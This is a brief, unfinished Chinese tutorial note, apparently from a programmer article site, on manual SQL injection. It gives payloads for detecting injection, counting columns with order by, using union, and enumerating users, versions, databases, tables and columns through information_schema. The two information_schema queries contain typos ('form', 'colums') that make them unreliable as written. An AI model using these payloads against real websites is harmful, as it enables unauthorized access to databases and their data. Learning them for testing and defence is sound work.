手工注入(未完)
程序员文章站
2022-05-23 21:50:01
...
判断是否存在注入
1
1' and 1=1;#
如果返回结果相同则可能存在注入,再次比较——
1' and 1=1;#
1' and 1=2;#
结果不同,则基本可以确定存在注入。
猜测表中的列数
1' order by 1;#
1' order by 2;#
1' order by 3;#
...
...
直到报错为止,order by 后的值就是列数。
拼接语句
union all
获取额外信息
当前用户信息:user()
当前版本信息:@@version
当前数据库名:database()
获取表中列名
select TABLE_NAME , COLUMN_NAME form information_schema.colums where table_name = '表名'
获取数据库中表名
select TABLE_SCHEMA,TABLE_NAME form information_schema.tables where table_schema = '库名'